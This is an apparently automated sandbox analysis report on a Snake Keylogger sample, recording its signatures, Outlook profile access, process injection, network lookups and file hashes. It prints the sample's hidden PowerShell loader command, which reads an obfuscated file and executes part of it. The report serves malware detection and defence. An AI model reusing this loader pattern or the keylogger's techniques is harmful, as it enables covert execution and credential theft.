Analysis Overview
SHA256
f8aa18d4254a618c058dda0a2be332707f305795953a26402e7b5f791b778bf0
Threat Level: Known bad
The file Selvretfrdig.exe was found to be: Known bad.
Malicious Activity Summary
Snake Keylogger payload
Snake Keylogger
Command and Scripting Interpreter: PowerShell
Accesses Microsoft Outlook profiles
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Program crash
Enumerates physical storage devices
NSIS installer
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
outlook_office_path
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
outlook_win_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-09 09:49
Signatures
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-09 09:49
Reported
2024-07-09 09:52
Platform
win7-20240704-en
Max time kernel
122s
Max time network
127s
Command Line
Signatures
Snake Keylogger
Snake Keylogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2820 set thread context of 2592 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Selvretfrdig.exe
"C:\Users\Admin\AppData\Local\Temp\Selvretfrdig.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Forsvrgelsen=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Sperlingkasserne.Gla';$Decubitus=$Forsvrgelsen.SubString(65564,3);.$Decubitus($Forsvrgelsen)"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.67.152:443 | reallyfreegeoip.org | tcp |
Files
memory/2820-11-0x00000000737B1000-0x00000000737B2000-memory.dmp
memory/2820-12-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2820-14-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2820-13-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2820-15-0x00000000737B0000-0x0000000073D5B000-memory.dmp
C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Sperlingkasserne.Gla
| MD5 | c9035c38abb2f8b3e1255a2320926c2b |
| SHA1 | 29ee2663a1f9e8c907791957558b79dff166413c |
| SHA256 | 92eca1cfe870c436907085d7d2d85ea69c5596d456a98224937d631cfaf4adc6 |
| SHA512 | 9b1f7655ec40cd92a873547bf7b8b03de824ee53bf2cbd516ec245e3cbc385e6659ce61ce5c94c1460877d697a42fbf1ee65db3abed1474c7aeec233208e89f7 |
memory/2820-18-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2820-19-0x00000000737B0000-0x0000000073D5B000-memory.dmp
C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Presenile.Tel
| MD5 | 67bfad28d1127c53a9aac5c51b3b77b8 |
| SHA1 | 896af109b830f91baa527847b2cf968cba28b771 |
| SHA256 | 38c27304ea5dcdcdbf5214a38989559b4f2feb79b73d680ec96cf2e9e220225d |
| SHA512 | 8eb928e4731dda023c4b253539cd5e6246bcdc2bdbbe74e2f745f129c829a64b04c7d746630eb66a504b417332ea42b6d9bfd987f4704cb51660750fbe467b8b |
memory/2820-21-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2820-22-0x00000000064A0000-0x000000000737B000-memory.dmp
memory/2592-24-0x0000000000730000-0x0000000001792000-memory.dmp
memory/2592-44-0x0000000000730000-0x0000000001792000-memory.dmp
memory/2592-45-0x0000000000730000-0x0000000000756000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-09 09:49
Reported
2024-07-09 09:51
Platform
win10v2004-20240704-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 988 wrote to memory of 3260 | N/A | C:\Users\Admin\AppData\Local\Temp\Selvretfrdig.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 988 wrote to memory of 3260 | N/A | C:\Users\Admin\AppData\Local\Temp\Selvretfrdig.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 988 wrote to memory of 3260 | N/A | C:\Users\Admin\AppData\Local\Temp\Selvretfrdig.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Selvretfrdig.exe
"C:\Users\Admin\AppData\Local\Temp\Selvretfrdig.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Forsvrgelsen=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Sperlingkasserne.Gla';$Decubitus=$Forsvrgelsen.SubString(65564,3);.$Decubitus($Forsvrgelsen)"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3260 -ip 3260
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3260 -s 2792
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.109.69.13.in-addr.arpa | udp |
Files
memory/3260-9-0x000000007372E000-0x000000007372F000-memory.dmp
memory/3260-10-0x0000000003230000-0x0000000003266000-memory.dmp
memory/3260-12-0x0000000073720000-0x0000000073ED0000-memory.dmp
memory/3260-11-0x0000000005A60000-0x0000000006088000-memory.dmp
memory/3260-13-0x0000000005840000-0x0000000005862000-memory.dmp
memory/3260-14-0x00000000058E0000-0x0000000005946000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_td5xlhxv.kv4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3260-15-0x0000000006190000-0x00000000061F6000-memory.dmp
memory/3260-21-0x0000000073720000-0x0000000073ED0000-memory.dmp
memory/3260-26-0x0000000006200000-0x0000000006554000-memory.dmp
memory/3260-27-0x00000000067E0000-0x00000000067FE000-memory.dmp
memory/3260-28-0x0000000006830000-0x000000000687C000-memory.dmp
memory/3260-29-0x0000000006D60000-0x0000000006DF6000-memory.dmp
memory/3260-30-0x0000000006D10000-0x0000000006D2A000-memory.dmp
memory/3260-31-0x00000000077D0000-0x00000000077F2000-memory.dmp
memory/3260-32-0x0000000007DB0000-0x0000000008354000-memory.dmp
C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Sperlingkasserne.Gla
| MD5 | c9035c38abb2f8b3e1255a2320926c2b |
| SHA1 | 29ee2663a1f9e8c907791957558b79dff166413c |
| SHA256 | 92eca1cfe870c436907085d7d2d85ea69c5596d456a98224937d631cfaf4adc6 |
| SHA512 | 9b1f7655ec40cd92a873547bf7b8b03de824ee53bf2cbd516ec245e3cbc385e6659ce61ce5c94c1460877d697a42fbf1ee65db3abed1474c7aeec233208e89f7 |
memory/3260-34-0x00000000089E0000-0x000000000905A000-memory.dmp
memory/3260-36-0x0000000073720000-0x0000000073ED0000-memory.dmp